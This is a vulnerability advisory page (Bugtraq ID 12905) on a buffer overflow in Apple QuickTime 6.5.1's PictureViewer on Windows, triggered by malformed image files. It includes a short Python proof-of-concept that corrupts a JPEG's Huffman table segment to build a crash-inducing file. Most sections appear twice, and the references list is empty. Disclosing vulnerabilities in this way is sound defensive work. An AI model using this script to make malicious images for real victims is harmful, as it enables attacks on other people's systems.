Apple QuickTime PictureViewer Buffer Overflow Vulnerability
BID:12905
Info
Apple QuickTime PictureViewer Buffer Overflow Vulnerability
| Bugtraq ID: | 12905 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2005 12:00AM |
| Updated: | Mar 26 2005 12:00AM |
| Credit: | Credited to <[email protected]>. |
| Vulnerable: |
Apple QuickTime Player 6.5.1 |
| Not Vulnerable: | |
Discussion
Apple QuickTime PictureViewer Buffer Overflow Vulnerability
Apple QuickTime is reportedly prone to a buffer overflow when viewing malformed image files.
This issue was reported to exist in QuickTime 6.5.1 for Windows. Other versions may also be affected.
This issue may be related to BID 11553.
Apple QuickTime is reportedly prone to a buffer overflow when viewing malformed image files.
This issue was reported to exist in QuickTime 6.5.1 for Windows. Other versions may also be affected.
This issue may be related to BID 11553.
Exploit / POC
Apple QuickTime PictureViewer Buffer Overflow Vulnerability
The following Python script was provided to generate malformed JPEG files intended to exploit this issue:
import struct
f=open(raw_input("enter the path to the input file:\n"),"rb")
a=f.read()
f.close()
n=a.index("\xff\xc4")
b=a[:n]+"\xff\xc4\x02\x11\x00\xff\xff"+"\x00"*14+"\x01"*510
+a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:]
f=open(raw_input("enter the path to the output file:\n"),"wb")
f.write(b)
f.close()
The following Python script was provided to generate malformed JPEG files intended to exploit this issue:
import struct
f=open(raw_input("enter the path to the input file:\n"),"rb")
a=f.read()
f.close()
n=a.index("\xff\xc4")
b=a[:n]+"\xff\xc4\x02\x11\x00\xff\xff"+"\x00"*14+"\x01"*510
+a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:]
f=open(raw_input("enter the path to the output file:\n"),"wb")
f.write(b)
f.close()
Solution / Fix
Apple QuickTime PictureViewer Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Apple QuickTime PictureViewer Buffer Overflow Vulnerability
References:
References: